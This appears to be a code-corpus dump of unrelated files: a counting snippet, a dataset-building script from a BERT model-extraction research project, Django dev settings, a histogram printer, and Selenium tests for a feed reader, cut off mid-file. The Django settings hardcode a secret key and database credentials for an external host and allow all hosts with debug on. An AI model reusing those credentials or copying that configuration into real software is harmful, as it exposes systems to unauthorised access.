mod = 10**9+7
print((pow(10, n, mod) - 2*pow(9, n, mod) + pow(8, n, mod)) % mod)
| true | true |
f726020d71b71fa88e43f762ead78c688e3c3a3a | 3,322 | py | Python | language/bert_extraction/steal_bert_qa/data_generation/preprocess_thief_dev_squad.py | IngrojShrestha/language | 674a3d016b1e17658e301e8d9bdfa63e3d3f5d15 | [
"Apache-2.0"
] | 1 | 2020-05-30T15:19:39.000Z | 2020-05-30T15:19:39.000Z | language/bert_extraction/steal_bert_qa/data_generation/preprocess_thief_dev_squad.py | IngrojShrestha/language | 674a3d016b1e17658e301e8d9bdfa63e3d3f5d15 | [
"Apache-2.0"
] | null | null | null | language/bert_extraction/steal_bert_qa/data_generation/preprocess_thief_dev_squad.py | IngrojShrestha/language | 674a3d016b1e17658e301e8d9bdfa63e3d3f5d15 | [
"Apache-2.0"
] | null | null | null | # coding=utf-8
# Copyright 2018 The Google AI Language Team Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Construct a held-out / validation set from a large pool of WIKI / RANDOM queries ensuring there is no overlap with the train set."""
import json
import random
import numpy as np
import tensorflow.compat.v1 as tf
# Short aliases for the TF compatibility shims used throughout this script.
app = tf.compat.v1.app
flags = tf.flags
gfile = tf.gfile
logging = tf.logging
flags.DEFINE_string("pool_dataset", None,
                    "Large pool of queries having training set distribution.")
flags.DEFINE_string("train_dataset", None,
                    "Training set of queries used for model extraction.")
flags.DEFINE_integer("dev_dataset_size", 10570,
                     "Number of QAs in held-out set. (default: SQuAD 1.1 size")
flags.DEFINE_string("output_path", None, "Output path for the held-out set.")
# BUG FIX: main() reads FLAGS.version for the output JSON, but no such flag
# was ever defined, which crashed at runtime.  Default to SQuAD's "1.1".
flags.DEFINE_string("version", "1.1",
                    "Version string written into the output dataset.")
flags.DEFINE_integer("random_seed", 42, "Random seed for determinism.")
FLAGS = flags.FLAGS
def main(_):
  """Build a held-out set from the pool, excluding paragraphs seen in training."""
  random.seed(FLAGS.random_seed)
  np.random.seed(FLAGS.random_seed)

  with gfile.Open(FLAGS.pool_dataset, "r") as f:
    pool_data = json.loads(f.read())["data"]

  with gfile.Open(FLAGS.train_dataset, "r") as f:
    train_data = json.loads(f.read())["data"]

  # Paragraph texts already used for training; held-out paragraphs must not
  # overlap with any of these.
  all_train_paras = {}
  for inst in train_data:
    for para in inst["paragraphs"]:
      all_train_paras[para["context"]] = 1

  num_dev_questions = FLAGS.dev_dataset_size

  # sanity check to verify all pool dataset question IDs are unique
  num_pool_questions = 0
  pool_qids = {}
  for inst in pool_data:
    for para in inst["paragraphs"]:
      for qa in para["qas"]:
        num_pool_questions += 1
        pool_qids[qa["id"]] = 1
  assert len(pool_qids) == num_pool_questions

  random.shuffle(pool_data)

  # BUG FIX: FLAGS.version was read here without a corresponding flag
  # definition, raising at runtime; fall back to SQuAD's "1.1" when the
  # flag is absent so this edit also works standalone.
  output_data = {"data": [], "version": getattr(FLAGS, "version", "1.1")}

  # Greedily collect non-overlapping paragraphs until enough questions are
  # gathered; the counter may go slightly negative on the last paragraph.
  for instance in pool_data:
    curr_instance = {"title": "Random dev data", "paragraphs": []}
    for para in instance["paragraphs"]:
      # Even if there is a paragraph overlap, do not consider it for the
      # held-out set since we want to minimize overlap
      if para["context"] in all_train_paras:
        continue
      # Assume different paragraphs have different questions
      curr_instance["paragraphs"].append(para)
      num_dev_questions = num_dev_questions - len(para["qas"])
      if num_dev_questions <= 0:
        break
    if curr_instance["paragraphs"]:
      output_data["data"].append(curr_instance)
    if num_dev_questions <= 0:
      break

  # Report the actual number of questions collected (may differ slightly
  # from dev_dataset_size because whole paragraphs are taken).
  total_questions = 0
  for instance in output_data["data"]:
    for para in instance["paragraphs"]:
      for qa in para["qas"]:
        total_questions += 1
  logging.info("Final dataset size = %d", total_questions)

  with gfile.Open(FLAGS.output_path, "w") as f:
    f.write(json.dumps(output_data))
if __name__ == "__main__":
  app.run(main)  # parses the flags defined above, then invokes main
| 31.638095 | 135 | 0.695665 |
import json
import random
import numpy as np
import tensorflow.compat.v1 as tf
app = tf.compat.v1.app
flags = tf.flags
gfile = tf.gfile
logging = tf.logging
flags.DEFINE_string("pool_dataset", None,
"Large pool of queries having training set distribution.")
flags.DEFINE_string("train_dataset", None,
"Training set of queries used for model extraction.")
flags.DEFINE_integer("dev_dataset_size", 10570,
"Number of QAs in held-out set. (default: SQuAD 1.1 size")
flags.DEFINE_string("output_path", None, "Output path for the held-out set.")
flags.DEFINE_integer("random_seed", 42, "Random seed for determinism.")
FLAGS = flags.FLAGS
def main(_):
random.seed(FLAGS.random_seed)
np.random.seed(FLAGS.random_seed)
with gfile.Open(FLAGS.pool_dataset, "r") as f:
pool_data = json.loads(f.read())["data"]
with gfile.Open(FLAGS.train_dataset, "r") as f:
train_data = json.loads(f.read())["data"]
all_train_paras = {}
for inst in train_data:
for para in inst["paragraphs"]:
all_train_paras[para["context"]] = 1
num_dev_questions = FLAGS.dev_dataset_size
num_pool_questions = 0
pool_qids = {}
for inst in pool_data:
for para in inst["paragraphs"]:
for qa in para["qas"]:
num_pool_questions += 1
pool_qids[qa["id"]] = 1
assert len(pool_qids) == num_pool_questions
random.shuffle(pool_data)
output_data = {"data": [], "version": FLAGS.version}
for instance in pool_data:
curr_instance = {"title": "Random dev data", "paragraphs": []}
for para in instance["paragraphs"]:
if para["context"] in all_train_paras:
continue
curr_instance["paragraphs"].append(para)
num_dev_questions = num_dev_questions - len(para["qas"])
if num_dev_questions <= 0:
break
if curr_instance["paragraphs"]:
output_data["data"].append(curr_instance)
if num_dev_questions <= 0:
break
total_questions = 0
for instance in output_data["data"]:
for para in instance["paragraphs"]:
for qa in para["qas"]:
total_questions += 1
logging.info("Final dataset size = %d", total_questions)
with gfile.Open(FLAGS.output_path, "w") as f:
f.write(json.dumps(output_data))
if __name__ == "__main__":
app.run(main)
| true | true |
f72604d331367abace2bd7856e05fc96d5ec665a | 3,831 | py | Python | visualisation_engine/settings/dev.py | QualiChain/visualisation_engine_ | 8ec00aa08d703a9f23462d73236f1e20e9168237 | [
"MIT"
] | null | null | null | visualisation_engine/settings/dev.py | QualiChain/visualisation_engine_ | 8ec00aa08d703a9f23462d73236f1e20e9168237 | [
"MIT"
] | null | null | null | visualisation_engine/settings/dev.py | QualiChain/visualisation_engine_ | 8ec00aa08d703a9f23462d73236f1e20e9168237 | [
"MIT"
] | null | null | null | """
Django settings for visualisation_engine project.
Generated by 'django-admin startproject' using Django 3.1.
For more information on this file, see
https://docs.djangoproject.com/en/3.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/3.1/ref/settings/
"""
from pathlib import Path
import os
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/3.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
# NOTE(review): key is hardcoded in a dev settings module; production must
# load its own secret (e.g. from the environment) -- confirm deployment setup.
SECRET_KEY = 's5oyds$!u$m%m#oq6iqr!=sq)$5gt(bo6bnu+2qsg#fcgzfw@b'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
# Wildcard host matching -- acceptable for development only.
ALLOWED_HOSTS = ['*']
# CORS: allow requests from any origin (development convenience).
CORS_ORIGIN_ALLOW_ALL = True
# Application definition
INSTALLED_APPS = [
    'django.contrib.admin',
    'django.contrib.auth',
    'django.contrib.contenttypes',
    'django.contrib.sessions',
    'django.contrib.messages',
    # CORS
    'corsheaders',
    'django.contrib.staticfiles',
    'visualiser',
    # 'data_manager'
]
MIDDLEWARE = [
    'django.middleware.security.SecurityMiddleware',
    'django.contrib.sessions.middleware.SessionMiddleware',
    # CORS middleware must sit above CommonMiddleware per django-cors-headers.
    'corsheaders.middleware.CorsMiddleware',
    'django.middleware.common.CommonMiddleware',
    'django.middleware.csrf.CsrfViewMiddleware',
    'django.contrib.auth.middleware.AuthenticationMiddleware',
    'django.contrib.messages.middleware.MessageMiddleware',
    'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'visualisation_engine.urls'
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'DIRS': [os.path.join(BASE_DIR, 'templates')]
        ,
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.debug',
                'django.template.context_processors.request',
                'django.contrib.auth.context_processors.auth',
                'django.contrib.messages.context_processors.messages',
            ],
        },
    },
]
WSGI_APPLICATION = 'visualisation_engine.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# No Django DATABASES setting is active here; see ENGINE_STRING below for
# the external SQLAlchemy-style connection this project uses instead.
# DATABASES = {
#     'default': {
#         'ENGINE': 'django.db.backends.sqlite3',
#         'NAME': BASE_DIR / 'db.sqlite3',
#     }
# }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
    {
        'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
    },
    {
        'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
    },
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
# NOTE(review): Django's setting is named STATICFILES_FINDERS; this
# STATIC_FINDER name is likely ignored by Django -- confirm intent.
STATIC_FINDER = [
    'django.contrib.staticfiles.finders.FileSystemFinder',
    'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles/')
STATICFILES_DIRS = [
    os.path.join(BASE_DIR, '../static'),
]
TEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)
# external postgres
# NOTE(review): credentials and host are hardcoded here -- move to
# environment variables before any non-dev use.
ENGINE_STRING = 'postgresql+psycopg2://{}:{}@{}:{}/{}'.format(
    'admin',
    'admin',
    'qualichain.epu.ntua.gr',
    5435,
    'qualichain_db'
)
from pathlib import Path
import os
BASE_DIR = Path(__file__).resolve(strict=True).parent.parent
SECRET_KEY = 's5oyds$!u$m%m#oq6iqr!=sq)$5gt(bo6bnu+2qsg#fcgzfw@b'
DEBUG = True
ALLOWED_HOSTS = ['*']
#CORS
CORS_ORIGIN_ALLOW_ALL = True
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
# CORS
'corsheaders',
'django.contrib.staticfiles',
'visualiser',
# 'data_manager'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
#CORS
'corsheaders.middleware.CorsMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'visualisation_engine.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')]
,
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'visualisation_engine.wsgi.application'
# Database
# https://docs.djangoproject.com/en/3.1/ref/settings/#databases
# DATABASES = {
# 'default': {
# 'ENGINE': 'django.db.backends.sqlite3',
# 'NAME': BASE_DIR / 'db.sqlite3',
# }
# }
# Password validation
# https://docs.djangoproject.com/en/3.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/3.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/3.1/howto/static-files/
STATIC_URL = '/static/'
STATIC_FINDER = [
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
]
STATIC_ROOT = os.path.join(BASE_DIR, 'staticfiles/')
STATICFILES_DIRS = [
os.path.join(BASE_DIR, '../static'),
]
TEMPLATE_DIRS = (os.path.join(BASE_DIR, 'templates'),)
# external postgres
ENGINE_STRING = 'postgresql+psycopg2://{}:{}@{}:{}/{}'.format(
'admin',
'admin',
'qualichain.epu.ntua.gr',
5435,
'qualichain_db'
) | true | true |
f72605046ec8fd6a2d4e80f3aaede195b2b0f3f8 | 233 | py | Python | print_histogram.py | lwoznicki/Python-simple-code | 72486f8f18f8ffc019838be4b1d7d45c68356a0e | [
"MIT"
] | null | null | null | print_histogram.py | lwoznicki/Python-simple-code | 72486f8f18f8ffc019838be4b1d7d45c68356a0e | [
"MIT"
] | null | null | null | print_histogram.py | lwoznicki/Python-simple-code | 72486f8f18f8ffc019838be4b1d7d45c68356a0e | [
"MIT"
] | 1 | 2020-01-04T20:45:26.000Z | 2020-01-04T20:45:26.000Z | def print_histogram(h):
dict = []
dict += sorted(h.keys())
for e in dict:
print(e, h[e])
# Demo: letter frequencies of the word "spaghetti".
spaghetti = {'s' : 1, 'p' : 1, 'a' : 1, 'g' : 1, 'h' : 1, 'e' : 1 ,'t' : 2 , 'i' : 1}
print_histogram(spaghetti)
| 25.888889 | 86 | 0.450644 | def print_histogram(h):
dict = []
dict += sorted(h.keys())
for e in dict:
print(e, h[e])
spaghetti = {'s' : 1, 'p' : 1, 'a' : 1, 'g' : 1, 'h' : 1, 'e' : 1 ,'t' : 2 , 'i' : 1}
print_histogram(spaghetti)
| true | true |
f726052b6ebb1901f2bd60dbf982fdea48f38b54 | 12,031 | py | Python | functional_tests/test_views.py | wivn/feed-reader | 1b4524fcdfc79391a5cf982ce9c5681e600f4303 | [
"MIT"
] | null | null | null | functional_tests/test_views.py | wivn/feed-reader | 1b4524fcdfc79391a5cf982ce9c5681e600f4303 | [
"MIT"
] | null | null | null | functional_tests/test_views.py | wivn/feed-reader | 1b4524fcdfc79391a5cf982ce9c5681e600f4303 | [
"MIT"
] | null | null | null | from django.test import LiveServerTestCase
from selenium import webdriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from unittest import mock
import feedparser
import time
import datetime
from django.core.management import call_command
from django.contrib.auth import get_user_model
from feed.models import Entry
User = get_user_model()
class BaseLiveServerTestCase(LiveServerTestCase):
    """Selenium base case: creates a user and logs the browser in via the
    Django test client's session cookie (Safari driver)."""

    def setUp(self):
        self.browser = webdriver.Safari()
        self.wait = WebDriverWait(self.browser, MAX_WAIT)
        user = User.objects.create_user(username="myself", password="superCoolPassword")
        user.save()
        # Log in with the test client, then hand its session cookie to Selenium.
        self.client.force_login(user)
        cookie = self.client.cookies['sessionid']
        # NEED TO SETUP COOKIE
        self.browser.get(self.live_server_url) #selenium will set cookie domain based on current page domain
        self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
        self.browser.refresh() #need to update page for logged in user
        self.browser.get(self.live_server_url)
    def tearDown(self):
        # Always release the browser, even when a test fails.
        self.browser.quit()
class FixturesTestCase(LiveServerTestCase):
    """Like BaseLiveServerTestCase but loads data.json and logs in as the
    first existing user instead of creating one."""

    # Fixture data loaded by Django before each test.
    fixtures = ["data.json"]
    def setUp(self):
        self.browser = webdriver.Safari()
        self.wait = WebDriverWait(self.browser, MAX_WAIT)
        user = User.objects.first()
        # Log in with the test client, then hand its session cookie to Selenium.
        self.client.force_login(user)
        cookie = self.client.cookies['sessionid']
        # NEED TO SETUP COOKIE
        self.browser.get(self.live_server_url) #selenium will set cookie domain based on current page domain
        self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
        self.browser.refresh() #need to update page for logged in user
        self.browser.get(self.live_server_url)
    def tearDown(self):
        # Always release the browser, even when a test fails.
        self.browser.quit()
# TODO: Replace time.sleeps with waits
# Shared fixtures for the canned Atom feed used by the mocked fetchers below.
MAX_WAIT = 10  # seconds: explicit-wait timeout for WebDriverWait
test_url = "https://www.example.org/feed.xml"
test_url_base = "https://www.example.org"
recent_date = datetime.datetime.now()
old_date = recent_date - datetime.timedelta(days = 14)  # older than the 7-day "latest" window
test_page = f"""<feed xmlns="http://www.w3.org/2005/Atom"><generator uri="https://jekyllrb.com/" version="3.8.5">Jekyll</generator><link href="https://www.example.org/feed.xml" rel="self" type="application/atom+xml"/><link href="https://www.example.org/" rel="alternate" type="text/html"/><updated>2020-06-29T16:00:05+00:00</updated><id>https://www.example.org/feed.xml</id><title type="html">Example Feed</title><author><name>Example Writer</name></author><entry><title type="html">Entry 1</title><link href="https://www.example.org/1" rel="alternate" type="text/html" title="Entry 1"/><published>{recent_date}</published><updated>{recent_date}</updated><id>https://www.example.org/1</id><content type="html" xml:base="https://www.example.org/1">hello 1</content><author><name>Example Writer</name></author><summary type="html"/></entry><entry><title type="html">Entry 2</title><link href="https://www.example.org/2" rel="alternate" type="text/html" title="Entry 2"/><published>{old_date}</published><updated>{old_date}</updated><id>https://www.example.org/2</id><content type="html" xml:base="https://www.example.org/2">hello 2</content><author><name>Example Writer</name></author><summary type="html">hello 2</summary></entry></feed>"""
# Pre-parse the canned feed once; the fake parser below returns this object.
test_feed = feedparser.parse(test_page)
entries = ["Entry 1", "Entry 2"]  # expected entry titles, in feed order
test_feed.etag = None  # feedparser sets etag from HTTP headers; none here
def fake_find_out_type(url):
    """Test stub for feed.feedTools.find_out_type: always resolve to the canned feed."""
    return (test_url, test_page , test_url)
def fake_feed_parser(a, *args, **kwargs):
    """Test stub for feedparser.parse: return the pre-parsed canned feed."""
    return test_feed
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class FunctionalTest(BaseLiveServerTestCase):
    # Note: "test_inital" is a typo for "test_initial", kept as-is since
    # renaming is outside a documentation-only change.
    def test_inital(self, func_1, func_2):
        """Subscribe to a feed and verify its entries appear on home and /latest."""
        # The user will open the web page to the homepage
        self.browser.get(self.live_server_url)
        # They will see the form to add a new subscription and enter their url
        feed_form = self.browser.find_element_by_css_selector("#new_url_to_add")
        feed_form.send_keys(test_url)
        feed_form.send_keys(Keys.ENTER)
        # They will then see their URL appear in the subscriptions
        subscriptions = [sub.text for sub in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".subscription")))]
        self.assertEqual(len(subscriptions), 1)
        self.assertIn(test_url_base, subscriptions[0])
        # They will see all the entries they expected as well
        titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
        self.assertEqual(entries, titles)
        # The user is happy, but they want to catch up on the past seven days. So they go to the latest page.
        self.browser.get(self.live_server_url + "/latest")
        # They see all the entries they expect there (only the recent one)
        titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
        self.assertEqual(len(titles), 1)
        self.assertEqual([entries[0]], titles)
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class CurrentlyReadingPageTest(FixturesTestCase):
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_home_page(self, func_1, func_2):
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will mark an item as currently reading
entry_1_title = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")][0]
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# That item will disappear from the page
entries_titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
self.assertNotIn(entry_1_title, entries_titles)
# The user will then go to the current page and see their item
self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title")))][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles_from_current_page)
# The user then decides they want to remove the item from their currently reading list
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# The user no longer sees the item there
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
# There will only be 1, so once it's invisible it's all gone so it'll be True
self.assertEqual(True, entries_titles)
# The user visits the homepage and sees it
self.browser.get(self.live_server_url)
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_latest_page(self, func_1, func_2):
# ENSURE THEY ARE ALWAYS LATEST
entry = Entry.objects.first()
entry.published = datetime.datetime.now()
entry.save()
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will open the web page to the homepage
self.browser.get(self.live_server_url+'/latest/')
self.wait.until(EC.text_to_be_present_in_element((By.CSS_SELECTOR, ".main-title"), "Latest"))
# The user will mark an item as currently reading
entry_1_title = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
entry_1_title = entry_1_title.text
entry_1_currently_reading_button = self.wait.until(EC.visibility_of_element_located((By.CSS_SELECTOR, ".entry__currently_reading__btn")))
entry_1_currently_reading_button.click()
# That item will disappear from the page
is_entry_gone = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
self.assertEqual(is_entry_gone, True)
# The user will then go to the current page and see their item
self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles_from_current_page)
# The user then decides they want to remove the item from their currently reading list
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
# The user no longer sees the item there
entries_titles = self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".entry__title")))
# if True then it's invisible
self.assertEqual(True, entries_titles)
# The user visits the current page and sees it
self.browser.get(self.live_server_url +'/latest')
entries_titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertIn(entry_1_title, entries_titles)
def test_can_mark_items_as_read_and_unread(self, func_1, func_2):
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# The user will mark an item as unread
entry_1_mark_reading_btn = self.browser.find_elements_by_class_name("entry__seen-unseen__btn")[0]
entry_1_mark_reading_btn.click()
# That item will be seen as read on the page
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertNotIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
entry_1_mark_reading_btn.click()
# That user decides to remark it as unread on the page
entry_1_mark_reading_btn = self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__seen-unseen__btn")))[0]
self.assertIn("entry__seen-unseen__btn--unread", entry_1_mark_reading_btn.get_attribute("class"))
def test_can_delete_subscription(self, func_1, func_2):
# The user will open the web page to the homepage
self.browser.get(self.live_server_url)
# They will then see their one subscription
subscriptions = [sub.text for sub in self.browser.find_elements_by_class_name("subscription")]
self.assertEqual(len(subscriptions), 1)
# They will delete their subscription
subscription_delete_btn = self.browser.find_element_by_class_name("subscription__delete")
subscription_delete_btn.click()
# The subscription will be gone
self.assertEqual(True, self.wait.until(EC.invisibility_of_element_located((By.CSS_SELECTOR, ".subscription"))))
# The entries also will be gone, as there was just one subscription
self.assertEqual([], self.browser.find_elements_by_class_name("entry__title")) | 66.104396 | 1,239 | 0.730114 | from django.test import LiveServerTestCase
from selenium import webdriver
from selenium.common.exceptions import WebDriverException
from selenium.webdriver.common.keys import Keys
from selenium.webdriver.common.by import By
from selenium.webdriver.support.ui import WebDriverWait
from selenium.webdriver.support import expected_conditions as EC
from unittest import mock
import feedparser
import time
import datetime
from django.core.management import call_command
from django.contrib.auth import get_user_model
from feed.models import Entry
User = get_user_model()
class BaseLiveServerTestCase(LiveServerTestCase):
def setUp(self):
self.browser = webdriver.Safari()
self.wait = WebDriverWait(self.browser, MAX_WAIT)
user = User.objects.create_user(username="myself", password="superCoolPassword")
user.save()
self.client.force_login(user)
cookie = self.client.cookies['sessionid']
self.browser.get(self.live_server_url)
self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
self.browser.refresh()
self.browser.get(self.live_server_url)
def tearDown(self):
self.browser.quit()
class FixturesTestCase(LiveServerTestCase):
fixtures = ["data.json"]
def setUp(self):
self.browser = webdriver.Safari()
self.wait = WebDriverWait(self.browser, MAX_WAIT)
user = User.objects.first()
self.client.force_login(user)
cookie = self.client.cookies['sessionid']
self.browser.get(self.live_server_url)
self.browser.add_cookie({'name': 'sessionid', 'value': cookie.value, 'secure': False, 'path': '/'})
self.browser.refresh()
self.browser.get(self.live_server_url)
def tearDown(self):
self.browser.quit()
MAX_WAIT = 10
test_url = "https://www.example.org/feed.xml"
test_url_base = "https://www.example.org"
recent_date = datetime.datetime.now()
old_date = recent_date - datetime.timedelta(days = 14)
test_page = f"""<feed xmlns="http://www.w3.org/2005/Atom"><generator uri="https://jekyllrb.com/" version="3.8.5">Jekyll</generator><link href="https://www.example.org/feed.xml" rel="self" type="application/atom+xml"/><link href="https://www.example.org/" rel="alternate" type="text/html"/><updated>2020-06-29T16:00:05+00:00</updated><id>https://www.example.org/feed.xml</id><title type="html">Example Feed</title><author><name>Example Writer</name></author><entry><title type="html">Entry 1</title><link href="https://www.example.org/1" rel="alternate" type="text/html" title="Entry 1"/><published>{recent_date}</published><updated>{recent_date}</updated><id>https://www.example.org/1</id><content type="html" xml:base="https://www.example.org/1">hello 1</content><author><name>Example Writer</name></author><summary type="html"/></entry><entry><title type="html">Entry 2</title><link href="https://www.example.org/2" rel="alternate" type="text/html" title="Entry 2"/><published>{old_date}</published><updated>{old_date}</updated><id>https://www.example.org/2</id><content type="html" xml:base="https://www.example.org/2">hello 2</content><author><name>Example Writer</name></author><summary type="html">hello 2</summary></entry></feed>"""
test_feed = feedparser.parse(test_page)
entries = ["Entry 1", "Entry 2"]
test_feed.etag = None
def fake_find_out_type(url):
return (test_url, test_page , test_url)
def fake_feed_parser(a, *args, **kwargs):
return test_feed
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class FunctionalTest(BaseLiveServerTestCase):
def test_inital(self, func_1, func_2):
self.browser.get(self.live_server_url)
feed_form = self.browser.find_element_by_css_selector("#new_url_to_add")
feed_form.send_keys(test_url)
feed_form.send_keys(Keys.ENTER)
subscriptions = [sub.text for sub in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".subscription")))]
self.assertEqual(len(subscriptions), 1)
self.assertIn(test_url_base, subscriptions[0])
titles = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
self.assertEqual(entries, titles)
self.browser.get(self.live_server_url + "/latest")
titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
self.assertEqual(len(titles), 1)
self.assertEqual([entries[0]], titles)
@mock.patch('feed.feedTools.find_out_type', side_effect=fake_find_out_type)
@mock.patch('feed.feedTools.feedparser.parse', side_effect=fake_feed_parser)
class CurrentlyReadingPageTest(FixturesTestCase):
def test_can_set_things_to_currently_reading_and_not_currently_reading_on_home_page(self, func_1, func_2):
self.browser.get(self.live_server_url)
entry_1_title = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")][0]
entry_1_currently_reading_button = self.browser.find_elements_by_class_name("entry__currently_reading__btn")[0]
entry_1_currently_reading_button.click()
entries_titles = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title"))) ]
self.assertNotIn(entry_1_title, entries_titles)
self.browser.get(self.live_server_url + "/current")
entry_1_title = [entry.text for entry in self.wait.until(EC.visibility_of_all_elements_located((By.CSS_SELECTOR, ".entry__title")))][0]
entries_titles_from_current_page = [entry.text for entry in self.browser.find_elements_by_class_name("entry__title")]
